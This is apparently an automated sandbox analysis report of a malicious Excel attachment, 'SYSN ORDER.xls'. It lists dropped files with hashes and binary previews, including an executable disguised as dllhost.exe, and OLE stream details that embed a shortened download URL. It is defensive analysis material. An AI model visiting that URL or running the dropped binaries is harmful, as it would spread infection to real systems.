                                                                                  SHA-512:DCCDF41CA06856BE0A931C4919A42E1ADAFC90D31F404E0F9E3A9F3D64F4AA9451A14B3FA3386E24F8C5191405A919A74A1C1DEDDBDB0E9630E96617ECB90515
                                                                                  Malicious:true
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}].f...........!.................#... ...@....... ....................................@.................................X#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................#......H.......X ................................................................(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......L...#Blob...........G.........%3............................................................6./.....r.....r.......................................... =.....P ......O.........U.....Z.....c.....g.....k...O.....O...!.O.....O.......!.....*.......=.......................................&..........<Module>.tn

                                                                                  C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.out

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (445), with CRLF, CR line terminators
                                                                                  Category:modified
                                                                                  Size (bytes):866
                                                                                  Entropy (8bit):5.301797412806547
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:AId3ka6KzpVEoSKaMD5DqBVKVrdFAMBJTH:Akka60/EoSKdDcVKdBJj
                                                                                  MD5:E1B9327E710DDD0A752062DCEA329804
                                                                                  SHA1:87E13F7856384CD8AECC6A824417E8C345F0A575
                                                                                  SHA-256:398663B987DBDE1CF384C31174A081472094960675D4A39024C1820AE562A52B
                                                                                  SHA-512:743E3F5B0FF1A75C477A172D192D62F9EB00B30FA6CCDE02B78EFDE147E521973648AAD3BA9057219942FDA289FB2DBA64D2E97F820E1600718A5297CF100175
                                                                                  Malicious:false
                                                                                  Preview:.C:\Windows\system32> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\tnesdt30\tnesdt30.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.3761.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

                                                                                  C:\Users\user\AppData\Local\Temp\xe1pvlqt.go1.ps1

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:very short file (no magic)
                                                                                  Category:dropped
                                                                                  Size (bytes):1
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:U:U
                                                                                  MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                  Malicious:false
                                                                                  Preview:1

                                                                                  C:\Users\user\AppData\Local\Temp\~DF07397FB908C5B4FE.TMP

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DF2C958FD442F9D1AC.TMP

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Local\Temp\~DFA455A9BB9C6A2709.TMP

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):512
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:3::
                                                                                  MD5:BF619EAC0CDF3F68D496EA9344137E8B
                                                                                  SHA1:5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5
                                                                                  SHA-256:076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
                                                                                  SHA-512:DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
                                                                                  Malicious:false
                                                                                  Preview:................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\AppData\Roaming\dllhost.exe

                                                                                  Download File
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):1028673
                                                                                  Entropy (8bit):7.272168802632154
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:ffmMv6Ckr7Mny5QLKUqJTFVdHB61DDREb:f3v+7/5QLRGTF7E6b
                                                                                  MD5:7F0098DCC054A27F80296ADF300573EC
                                                                                  SHA1:94BD05A8F7B8B79750025D0E9B6407BEB2B85C89
                                                                                  SHA-256:468981A4E110BCA0FA99EB08C2FBDA0E1482CF8EF5FBB3ADCF82DB6609AEDE24
                                                                                  SHA-512:904ADFADE566E1404D1D07EC1EB6141E06ABDC0B74A803946294124F485F7260DE2CBDDE32F2ABAAA96C0C25F3B476D39887502D5F304B3BC346D314119B1D77
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-...i.i.i..9.k.`.:.w.`.,...`.+.P.N%.c.N%.H.i.d.`. ./.w.:.k.w.;.h.i.8.h.`.>.h.Richi.........................PE..L.....K..........#..................c....... ....@..........................P......5!........@.......@.....................<...T.................................................................................... ..@............................text............................... ..`.rdata..\.... ......................@..@.data............h..................@....rsrc................H..............@..@................................................................................................................................................................................................................................................................................................................................

                                                                                  C:\Users\user\Desktop\B8230000

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):647168
                                                                                  Entropy (8bit):7.982778814255626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:O6JQtKmKXORstzDc6LYa3Kyq1mnHY0fNsRctTaMqsgtcc:xJ6KpXXYjgnHYcraMqsUd
                                                                                  MD5:E6830E17A424B514F781DA7FC2D8D14E
                                                                                  SHA1:A7FE435B195335FBA03E9C9DDD393C475172E175
                                                                                  SHA-256:802598A7AE615A2B92E663CA5C388E2B1B9027A3A6E8F656629192861B00F49C
                                                                                  SHA-512:6CEB02CA3D36D633AC1236BB54D8E0C973E4CEF49F2A7655A269CA59C1C2E97DDC3FB2F1784DFA146A5C81968E94C4611A06A1C60CE4847646CAB1259CFCE933
                                                                                  Malicious:false
                                                                                  Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                  C:\Users\user\Desktop\B8230000:Zone.Identifier

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):26
                                                                                  Entropy (8bit):3.95006375643621
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                  Malicious:false
                                                                                  Preview:[ZoneTransfer]....ZoneId=0

                                                                                  C:\Users\user\Desktop\SYSN ORDER.xls (copy)

                                                                                  Download File
                                                                                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                  File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 09:12:36 2024, Security: 1
                                                                                  Category:dropped
                                                                                  Size (bytes):647168
                                                                                  Entropy (8bit):7.982778814255626
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:O6JQtKmKXORstzDc6LYa3Kyq1mnHY0fNsRctTaMqsgtcc:xJ6KpXXYjgnHYcraMqsUd
                                                                                  MD5:E6830E17A424B514F781DA7FC2D8D14E
                                                                                  SHA1:A7FE435B195335FBA03E9C9DDD393C475172E175
                                                                                  SHA-256:802598A7AE615A2B92E663CA5C388E2B1B9027A3A6E8F656629192861B00F49C
                                                                                  SHA-512:6CEB02CA3D36D633AC1236BB54D8E0C973E4CEF49F2A7655A269CA59C1C2E97DDC3FB2F1784DFA146A5C81968E94C4611A06A1C60CE4847646CAB1259CFCE933
                                                                                  Malicious:true
                                                                                  Preview:......................>...................................9...................|.......~...............b.......d........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...........;.......=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Mon Sep 30 02:41:41 2024, Security: 1
                                                                                  Entropy (8bit):7.9645568514989975
                                                                                  TrID:
                                                                                  • Microsoft Excel sheet (30009/1) 47.99%
                                                                                  • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                                  • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                                  File name:SYSN ORDER.xls
                                                                                  File size:656'896 bytes
                                                                                  MD5:673bd0aa988ca4a1ef05edb3d5b68d60
                                                                                  SHA1:4b7d31c4d6a4cd94e95fdd7c35bca86f6e13ec38
                                                                                  SHA256:9db5ab81cbe373ea471f128ad2fdc98c9eb98c1ff3991046f7ca54823d9a6107
                                                                                  SHA512:0af25507fd68eb9e8a9df4b1a93f6fad31429d0c0d37d326482ace999f5859f18ef3521c7e71146f41afcf45e7bbaf0d1d77543cc8abfb9c38ac2057cca9929c
                                                                                  SSDEEP:12288:GOyBFRSc/ol3o3+io8tM7qgSwaY0c6bde1bmnyqkZH1:GTBShxE+iokM7qgadcgdwmlkZ
                                                                                  TLSH:20D4231A71C5DF3BC2052ABE4AC4C19E491EFCA5EF68914BBAC0739D35B8FF11502686
                                                                                  File Content Preview:........................>...................................9...................|.......~...............b.......d..............................................................................................................................................

                                                                                  File Icon

                                                                                  Icon Hash:276ea3a6a6b7bfbf

                                                                                  Static OLE Info

                                                                                  General

                                                                                  Document Type:OLE
                                                                                  Number of OLE Files:1

                                                                                  OLE File "SYSN ORDER.xls"

                                                                                  Indicators
                                                                                  Has Summary Info:
                                                                                  Application Name:Microsoft Excel
                                                                                  Encrypted Document:True
                                                                                  Contains Word Document Stream:False
                                                                                  Contains Workbook/Book Stream:True
                                                                                  Contains PowerPoint Document Stream:False
                                                                                  Contains Visio Document Stream:False
                                                                                  Contains ObjectPool Stream:False
                                                                                  Flash Objects Count:0
                                                                                  Contains VBA Macros:True
                                                                                  Summary
                                                                                  Code Page:1252
                                                                                  Author:
                                                                                  Last Saved By:
                                                                                  Create Time:2006-09-16 00:00:00
                                                                                  Last Saved Time:2024-09-30 01:41:41
                                                                                  Creating Application:Microsoft Excel
                                                                                  Security:1
                                                                                  Document Summary
                                                                                  Document Code Page:1252
                                                                                  Thumbnail Scaling Desired:False
                                                                                  Contains Dirty Links:False
                                                                                  Shared Document:False
                                                                                  Changed Hyperlinks:False
                                                                                  Application Version:786432

                                                                                  Streams with VBA

                                                                                  VBA File Name: Sheet1.cls, Stream Size: 977
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                                  VBA File Name:Sheet1.cls
                                                                                  Stream Size:977
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . Y 8 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d6 e0 59 38 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  VBA Code
                                                                                  Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                  VBA File Name: Sheet2.cls, Stream Size: 977
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                                  VBA File Name:Sheet2.cls
                                                                                  Stream Size:977
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5 b . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d6 e0 35 62 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  VBA Code
                                                                                  Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                  VBA File Name: Sheet3.cls, Stream Size: 977
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                                  VBA File Name:Sheet3.cls
                                                                                  Stream Size:977
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . W l . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d6 e0 57 6c 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  VBA Code
                                                                                  Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                  VBA File Name: ThisWorkbook.cls, Stream Size: 985
                                                                                  General
                                                                                  Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                                  VBA File Name:ThisWorkbook.cls
                                                                                  Stream Size:985
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . V . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - . 0
                                                                                  Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 d6 e0 56 f8 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  VBA Code
                                                                                  Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                  Streams

                                                                                  Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                                                                  General
                                                                                  Stream Path:\x1CompObj
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:114
                                                                                  Entropy:4.25248375192737
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 244
                                                                                  General
                                                                                  Stream Path:\x5DocumentSummaryInformation
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:244
                                                                                  Entropy:2.889430592781307
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                                  Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 200
                                                                                  General
                                                                                  Stream Path:\x5SummaryInformation
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:200
                                                                                  Entropy:3.278293668191049
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . 8 . . . . . . . . . .
                                                                                  Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                                  Stream Path: MBD001B973F/\x1CompObj, File Type: data, Stream Size: 99
                                                                                  General
                                                                                  Stream Path:MBD001B973F/\x1CompObj
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:99
                                                                                  Entropy:3.631242196770981
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                                  Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Stream Path: MBD001B973F/Package, File Type: Microsoft Excel 2007+, Stream Size: 27478
                                                                                  General
                                                                                  Stream Path:MBD001B973F/Package
                                                                                  CLSID:
                                                                                  File Type:Microsoft Excel 2007+
                                                                                  Stream Size:27478
                                                                                  Entropy:7.767256957232999
                                                                                  Base64 Encoded:True
                                                                                  Data ASCII:P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                  Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                  Stream Path: MBD001B9740/\x1Ole, File Type: data, Stream Size: 660
                                                                                  General
                                                                                  Stream Path:MBD001B9740/\x1Ole
                                                                                  CLSID:
                                                                                  File Type:data
                                                                                  Stream Size:660
                                                                                  Entropy:4.534937071919144
                                                                                  Base64 Encoded:False
                                                                                  Data ASCII:. . . . . ] 6 . w . . . . . . . . . . . . V . . . y . . . K . R . . . h . t . t . p . s . : . / . / . o . g . 1 . . . i . n . / . c . I . P . 5 . a . 8 . . . m . . i B . . I e . F . / G Q C ' . , " Y . . . . . . . . . . . . . . . . . . . a . F . E . d . i . j . Z . u . l . a . w . Z . Y . S . k . s . O . Q . l . K . C . U . W . x . j . d . w . U . o . A . 4 . h . 2 . G . p . Y . R . Q . l . Y . T . P . B . A . 2 . 4 . Y . D . i . s . F . 2 . Z . W . 9 . A . P . J . j . M . j . V . s . D . 7 . I . n . A . f
                                                                                  Data Raw:01 00 00 02 d9 0d 5d 36 fa 85 13 77 00 00 00 00 00 00 00 00 00 00 00 00 56 00 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 52 00 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 6f 00 67 00 31 00 2e 00 69 00 6e 00 2f 00 63 00 49 00 50 00 35 00 61 00 38 00 00 00 6d c0 bf bd e4 1c 03 69 42 e0 f0 1a ef e4 01 90 49 65 c3 94 e2 46 1d 2f be 47 83 f0 94 51 43 27 17 b3 ba 2c
                                                                                  Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 609348
                                                                                  General
                                                                                  Stream Path:Workbook
                                                                                  CLSID:
                                                                                  File Type:Applesoft BASIC program data, first line number 16
                                                                                  Stream Size:609348
                                                                                  Entropy:7.999431010598352
                                                                                  Base64 Encoded:True
